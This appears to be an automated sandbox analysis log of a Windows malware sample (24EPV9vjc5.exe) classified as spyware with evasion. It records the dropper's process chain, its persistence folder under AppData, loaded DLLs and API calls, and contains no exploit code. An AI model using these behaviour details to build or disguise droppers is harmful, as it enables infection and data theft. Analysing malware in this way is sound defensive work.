Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: String function: 00690237 appears 688 times
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: String function: 6C4A0C80 appears 46 times
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: String function: 6C4AB046 appears 47 times
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: String function: 6B2C0C80 appears 150 times
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: String function: 6B2CA51F appears 41 times
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: String function: 6B3A378B appears 100 times
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: String function: 6B2CB046 appears 63 times
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: String function: 6B2C0C67 appears 73 times
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: String function: 6B3A37C6 appears 50 times
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: String function: 6B3A3753 appears 191 times
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: String function: 001032F3 appears 83 times
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: String function: 00100726 appears 34 times
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: String function: 000C1F13 appears 53 times
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: String function: 000C3821 appears 498 times
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: String function: 00100237 appears 688 times

Source: LocalCtrl_alpha_v3.exe.5.dr

Static PE information: Resource name: ZIP type: Zip archive data (empty)

Source: lrgstosohhljqy.11.dr	Static PE information: Number of sections : 12 > 10
Source: qlar.5.dr	Static PE information: Number of sections : 12 > 10

Source: 24EPV9vjc5.exe, 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameconn.exe8 vs 24EPV9vjc5.exe
Source: 24EPV9vjc5.exe, 00000002.00000000.1321889168.00000000006BD000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenameconn.exe8 vs 24EPV9vjc5.exe
Source: 24EPV9vjc5.exe, 00000002.00000002.1642174913.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenameSQLUNIRL.DLLJ vs 24EPV9vjc5.exe

Source: 24EPV9vjc5.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP

Source: classification engine

Classification label: mal92.spyw.evad.winEXE@64/291@21/16

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 0_2_000FFE21 FormatMessageW,GetLastError,LocalFree,

0_2_000FFE21

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000C45EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,		0_2_000C45EE
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_006545EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,		2_2_006545EE

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,

2_2_5BB3CB21

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

Code function: _CreateService_@52,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,CreateServiceA,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,

2_2_5BB42A14

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 0_2_0010304F GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,

0_2_0010304F

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB37CC0 _FindResource@12,FindResourceW,newMultiByteFromWideChar,newMultiByteFromWideChar,FindResourceA,GlobalFree,GlobalFree,

2_2_5BB37CC0

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 0_2_000E6B88 ChangeServiceConfigW,GetLastError,

0_2_000E6B88

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB439D2 _StartServiceCtrlDispatcher_@4,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,StartServiceCtrlDispatcherA,MultiByteToWideChar,GlobalFree,GlobalFree,

2_2_5BB439D2

Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe

File created: C:\Users\user\AppData\Roaming\TaskManage

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3324:120:WilError_03

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

File created: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\

Jump to behavior

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: cabinet.dll	0_2_000C1070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: msi.dll	0_2_000C1070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: version.dll	0_2_000C1070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: wininet.dll	0_2_000C1070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: comres.dll	0_2_000C1070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: clbcatq.dll	0_2_000C1070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: msasn1.dll	0_2_000C1070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: crypt32.dll	0_2_000C1070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: feclient.dll	0_2_000C1070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: cabinet.dll	0_2_000C1070
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Command line argument: cabinet.dll	2_2_00651070
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Command line argument: msi.dll	2_2_00651070
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Command line argument: version.dll	2_2_00651070
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Command line argument: comres.dll	2_2_00651070
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Command line argument: clbcatq.dll	2_2_00651070
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Command line argument: msasn1.dll	2_2_00651070
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Command line argument: crypt32.dll	2_2_00651070
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Command line argument: feclient.dll	2_2_00651070
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Command line argument: cabinet.dll	2_2_00651070

Source: 24EPV9vjc5.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 24EPV9vjc5.exe

ReversingLabs: Detection: 47%

Source: 24EPV9vjc5.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: 24EPV9vjc5.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: RescueCDBurner.exe	String found in binary or memory: http://trolltech.com/xml/features/report-start-end-entity

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

File read: C:\Users\user\Desktop\24EPV9vjc5.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\24EPV9vjc5.exe "C:\Users\user\Desktop\24EPV9vjc5.exe"
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Process created: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe "C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe" -burn.clean.room="C:\Users\user\Desktop\24EPV9vjc5.exe" -burn.filehandle.attached=676 -burn.filehandle.self=520
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Process created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Process created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe "C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe"
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2060,i,18088822377575541774,13344456101487118209,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2864 --field-trial-handle=2068,i,8123229788222533181,5144099982838419640,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6732 --field-trial-handle=2068,i,8123229788222533181,5144099982838419640,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5356 --field-trial-handle=2068,i,8123229788222533181,5144099982838419640,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceuserer --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7044 --field-trial-handle=2068,i,8123229788222533181,5144099982838419640,262144 /prefetch:8
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Process created: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe "C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe" -burn.clean.room="C:\Users\user\Desktop\24EPV9vjc5.exe" -burn.filehandle.attached=676 -burn.filehandle.self=520	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Process created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Process created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2060,i,18088822377575541774,13344456101487118209,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2864 --field-trial-handle=2068,i,8123229788222533181,5144099982838419640,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6732 --field-trial-handle=2068,i,8123229788222533181,5144099982838419640,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5356 --field-trial-handle=2068,i,8123229788222533181,5144099982838419640,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceuserer --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7044 --field-trial-handle=2068,i,8123229788222533181,5144099982838419640,262144 /prefetch:8

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: qtcore4.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: qtgui4.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: qtnetwork4.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: qtxml4.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
